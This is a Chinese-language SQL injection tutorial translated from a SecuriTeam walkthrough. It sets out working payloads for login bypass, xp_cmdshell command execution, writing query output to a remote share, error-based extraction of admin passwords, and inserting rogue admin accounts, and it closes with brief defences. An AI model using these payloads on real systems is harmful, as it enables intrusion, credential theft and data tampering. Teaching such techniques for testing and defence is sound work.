SQL隱碼攻擊演練

　　這篇文章目的是讓初學者利用SQL隱碼攻擊技術來解決他們面臨的問題, 成功的使用它們,並在這種攻擊中保護自己。

　　1.0 介紹

　　當一臺機器只開啟了80埠, 你最依賴的漏洞掃描器也不能返回任何有用的內容, 並且你知道管理員經常為機器打補丁, 我們就不得不使用web攻擊方式了. SQL隱碼攻擊是web攻擊的一種型別 ,這種方式只需要開放80埠就夠了並且即使管理員打了全部的補丁也能工作. 它攻擊的目標是web程式(像ASP,JSP,PHP,CGI等)本身而不是web伺服器或系統上執行的服務.

　　本文不介紹任何新的東西, SQL隱碼攻擊已經被廣泛的討論和使用. 我們寫這篇文章目的是因為我們想要使用SQL隱碼攻擊進行一些演練測試,希望這個能對各位有用. 你可以在這裡找到一兩個竅門但是請你關注下"9.0 哪裡有更多的資訊?" 可以得到關於SQL隱碼攻擊更多，更深入的技術.

　　1.1 什麼是SQL隱碼攻擊?

　　通過網頁的輸入項來注入SQL查詢或命令是一種技巧。許多網頁會從使用者那裡獲取引數，並構建SQL查詢來訪問資料庫。以使用者登入為例，頁面收集使用者名稱和密碼然後構建SQL去查詢資料庫，來校驗使用者名稱和密碼的有效性。通過SQL隱碼攻擊，我們可以傳送經過精心編造的使用者名稱和/或密碼欄位，來改變SQL查詢語句並賦予 我們其它一些許可權。 

　　1.2 你需要什麼?

　　任意web瀏覽器。 

　　2.0 你應該尋找什麼?

　　嘗試尋找那些允許你提交資料的頁面，即: 登入頁面，查詢頁面，反饋資訊等等。有時，HTML頁面會用POST命令來把引數傳送到另外一個ASP頁面上去。那麼，你可能在URL中看不到引數。不過，你可以檢視頁面的HTML原始碼，查詢"FORM"標籤。你會在一些HTML原始碼中看到類似下面的東東:

　　<FORM action=Search/search.asp method=post>

　　<input type=hidden name=A value=C>

　　</FORM>

　　位於<FORM>和</FORM>之間的所有內容都可能暗含著有用的引數(利用你的智慧)。 

　　2.1 如果你找不到任何帶有輸入框的頁面怎麼辦?

　　你應該尋找諸如ASP, JSP, CGI, 或 PHP這樣的頁面。尤其要找那些攜帶有引數的 URL，比如:

　　http://duck/index.asp?id=10

　　3.0 如何測試它是否是易受攻擊的?

　　從一個單引號技巧開始。輸入類似這樣的內容:

　　hi' or 1=1--

　　到登入頁面中，或者密碼中，甚至直接在URL中。例如:

　　- Login: hi' or 1=1--　

　　- Pass: hi' or 1=1--

　　- http://duck/index.asp?id=hi' or 1=1--

　　假如你必須在一個hidden欄位中來這樣做，就把HTML原始碼下載下來，儲存到硬碟上，修改URL和相應的 hidden欄位。例如:

　　<FORM action=http://duck/Search/search.asp method=post>

　　<input type=hidden name=A value="hi' or 1=1--">

　　</FORM>

　　如果夠幸運，不需要任何使用者名稱和密碼你就可以登入。

　　3.1 為什麼是 ' or 1=1--? 

　　讓我們通過另外一個例子來展示' or 1=1-- 的重要性。除了能繞過“登入”驗證，它還能展示一些在正常情況下很難看到的額外資訊。假設，有一個ASP頁面，其功能是將我們導航到下面的URL：

　　http://duck/index.asp?category=food 

　　在URL中，'category'是變數名；food是賦給變數的值。為了完成導航功能，我們猜想ASP頁面應該包含下面的程式碼（這些程式碼是我們為了完成此測試而編寫的真實程式碼）：

　　v_cat = request("category") 

　　sqlstr="SELECT * FROM product WHERE PCategory='" & v_cat & "'" 

　　set rs=conn.execute(sqlstr) 

　　如上所示，變數v_cat獲取了引數category的值，SQL語句將變成：

　　SELECT * FROM product WHERE PCategory='food' 

　　該SQL語句將返回符合where條件的的結果集。在本例中，where條件是PCategory='food' 。

　　下面，假設我們將URL改成下面的形式：

　　http://duck/index.asp?category=food' or 1=1-- 

　　現在，變數v_cat等於"food' or 1=1-- "。將變數v_cat在SQL中進行替換，我們將得到下面語句：

　　SELECT * FROM product WHERE PCategory='food' or 1=1--' 

　　該語句將得到product表中所有記錄，無論PCategory是否等於'food'。“--”告訴MS SQL server忽略其後面的所有內容（筆者注：其實可以理解為註釋，“--”後面所有的內容都為註釋），方便我們處理單引號。在某些情況下，"--"可以被替換成”#“。

　　如果後臺的資料庫不是SQL Server，查詢語句的單引號就不能被忽略。在這種情況下，我們可以嘗試下面的查詢條件：

　　' or 'a'='a 

　　此時，SQL語句將變成：

　　SELECT * FROM product WHERE PCategory='food' or 'a'='a' 

　　根據真實的SQL語句，我們還可以嘗試以下各種變形：

　　' or 1=1-- 

　　" or 1=1-- 

　　or 1=1-- 

　　' or 'a'='a 

　　" or "a"="a 

　　') or ('a'='a

　　4.0 我如何通過SQL隱碼攻擊來進行遠端執行?

　　能夠注入SQL命名通常意味著我們可以隨意執行任何SQL查詢。預設安裝的MS SQL 服務是作為SYSTEM來執行的， 它相當於 Windows系統中的Administrator。我們可以利用儲存過程，比如master..xp_cmdshell 來進行遠端執行:

　　'; exec master..xp_cmdshell 'ping 10.10.1.2'--

　　如果單引號(')不管用，可以試試雙引號 (")。 

　　分號會終止當前的SQL查詢，這就允許你開始一個新的SQL命名。要驗證命令是否執行成功，你需要監聽來自10.10.1.2的 ICMP資料包，檢查是否收到來自伺服器的資料包:

　　#tcpdump icmp

　　如果你沒有收到任何來自伺服器的ping請求，並且收到了暗示許可錯誤的資訊，則有可能是管理員限制了Web使用者對儲存過程的訪問。

　　5.0 如何獲取SQL查詢的輸出?

　　可以通過使用sp_makewebtask把你的查詢寫入到HTML:

　　'; EXEC master..sp_makewebtask "\\10.10.1.3\share\output.html", "SELECT * FROM INFORMATION_SCHEMA.TABLES"

　　注意這個目標IP的資料夾"share"的共享許可權是Everyone.

　　6.0 如何從資料庫的ODBC錯誤訊息中獲取資料?

　　我們幾乎可以在MS SQL伺服器產生的錯誤訊息中得到任何我們想要的資料. 通過類似下面的這個地址:

　　http://duck/index.asp?id=10

　　我們將試圖把這個整數'10'和另外的字串進行UNION聯合操作:

　　http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--

　　系統表 INFORMATION_SCHEMA.TABLES 包含了伺服器上所有表的資訊. 這個TABLE_NAME 欄位包含資料庫中每個表的欄位. 這樣就不存在無此表無此欄位的問題了. 看我們的查詢語句:

　　SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES-

　　這個語句將會返回資料庫中第一個表的名字. 當我們使用這個字串值和一個數字'10'進行UNION操作, MS SQL 伺服器將會試圖轉換這個字串(nvarchar)為一個數字. 這會產生一個錯誤, 因為我們不能把nvarchar型別轉換成數字. 伺服器將會產生以下錯誤資訊:

　　Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

　　[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'table1' to a column of data type int.
/index.asp, line 5

　　這個錯誤訊息清楚的告訴我們這個值不能轉換為數字. 同時呢,裡面也包含了資料庫中第一個表的名字 ,就是"table1".

　　想獲取下一個表的名字,我們使用下面的語句:

　　http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('table1')--

　　我們也可以使用LIKE關鍵詞來搜尋資料:

　　http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE '%25login%25'--

　　輸出:

　　Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

　　[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'admin_login' to a column of data type int.
/index.asp, line 5

　　這個匹配, '%25login%25' 的結果和 %login% 是一樣的在SQL Server伺服器中.這樣,我們將得到 匹配的第一個表的名字, "admin_login".

　　6.1 如何挖掘到表所有列的名稱?

　　我們可以使用另一個非常有用的表INFORMATION_SCHEMA.COLUMNS 來標出某一個的表所有列名:

　　http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login'--

　　輸出:

　　Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

　　[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_id' to a column of data type int.
/index.asp, line 5

　　注意錯誤提示,裡面已經包含了第一個列名, 下面我們使用NOT IN ()來取得下一個列的名稱:

　　http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT IN ('login_id')--

　　輸出:

　　Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

　　[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_name' to a column of data type int.
/index.asp, line 5

　　按上面的步驟繼續下一個,我們就能獲得剩下的所有列的名稱, 即"password", "details"等列. 當我們得到下面的這個錯誤提示時,就表示我們已經找出所有的列名了. 

　　http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT IN ('login_id','login_name','password',details')--

　　輸出:

　　Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

　　[Microsoft][ODBC SQL Server Driver][SQL Server]ORDER BY items must appear in the select list if the statement contains a UNION operator.

　　/index.asp, line 5

　　6.2 如何檢索到我們想要的資料?

　　現在我們已經確認了一些重要的表，以及它們的列名,我們可以用同樣的技巧從資料庫中挖掘任何我們想要的資訊.

　　現在,讓我們從這個"admin_login"表中得到第一個login_name的值吧:

　　http://duck/index.asp?id=10 UNION SELECT TOP 1 login_name FROM admin_login--

　　輸出:

　　Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

　　[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'neo' to a column of data type int.

　　/index.asp, line 5

　　根據上面的錯誤提示我們知道這裡有一個管理員的登入名是"neo".下面,我們從資料庫中到"neo"的密碼:

　　http://duck/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='neo'--

　　Output:

　　Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

　　[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'm4trix' to a column of data type int.

　　/index.asp, line 5

　　密碼就在錯誤提示裡了,現在讓我們用"neo"和密碼"m4trix"登入試試吧.

　　6.3 如何獲取數字型字串的值？ 

　　上面所述的技術具有侷限性。在我們試圖轉換包含有效數字（即只是0-9之間的字元）的時候，我們沒有得到任何錯誤資訊。讓我們試著獲取"trinity"的密碼"31173":

　　http://duck/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='trinity'

　　我們可能得到"此頁面不存在“的錯誤。原因在於：在於整數（這時是10）聯接之前，密碼"31173"將轉換為一個數字。由於這是一個有效地聯接（UNION）語句，因此SQL Server不會丟擲ODBC錯誤資訊，因此我們將不能獲取到任何數字型的項。

　　為了解決這個問題，我們給數字型字串後面提交一些字母，這樣可以確保轉換失效。讓我們看看下面這個查詢：

　　http://duck/index.asp?id=10 UNION SELECT TOP 1 convert(int, password%2b'%20morpheus') FROM admin_login where login_name='trinity'

　　我們只是給我們需要的密碼文字後新增了加號（+）。（“+”的ASCII編碼是0x2b）。我們將給真正的密碼後新增“（空格）休眠符“。因此，即使我們有一個字元型字串”31173“，它最終將變為”31173休眠符“。通過手工呼叫convert()函式試圖把“31173休眠符“轉換為整數時，SQL Server丟擲ODBC錯誤資訊：

　　Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

　　[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value '31173 morpheus' to a column of data type int.

　　/index.asp, line 5

　　現在，你就可以使用密碼為"31173"的"trinity"使用者登陸了。

　　7.0 如何向資料庫中更新或插入資料?

　　當我們成功的獲取到一張表的所有欄位名後，我們就有可能UPDATE甚至INSERT一條新記錄到該表中。例如，修改"neo"的密碼:

　　http://duck/index.asp?id=10; UPDATE 'admin_login' SET 'password' = 'newpas5' WHERE login_name='neo'--

　　下面INSERT一條新記錄到資料庫中:

　　http://duck/index.asp?id=10; INSERT INTO 'admin_login' ('login_id', 'login_name', 'password', 'details') VALUES (666,'neo2','newpas5','NA')--

　　現在我們可以用使用者名稱"neo2"和密碼"newpas5"來登入了。

　　8.0 如何避免SQL隱碼攻擊？

　　過濾引數中的單引號、雙引號、斜槓、反斜槓、分號等字元；以及NULL、回車符、換行符等擴充套件字元。這些引數可能來自於：

• 前臺表單（form）中的使用者輸入
• URL中的引數
• cookie

　　對於數字，在將其傳入SQL語句之前將其從字串(String)轉換成數字(Number)；或者用ISNUMERIC函式確定其確實是數字。

　　將SQL Server的執行使用者修改為低許可權使用者（low privilege user)。

　　刪除不再需要的儲存過程，例如：master..Xp_cmdshell, xp_startmail, xp_sendmail, sp_makewebtask 

　　原文地址：http://www.securiteam.com/securityreviews/5DP0N1P76E.html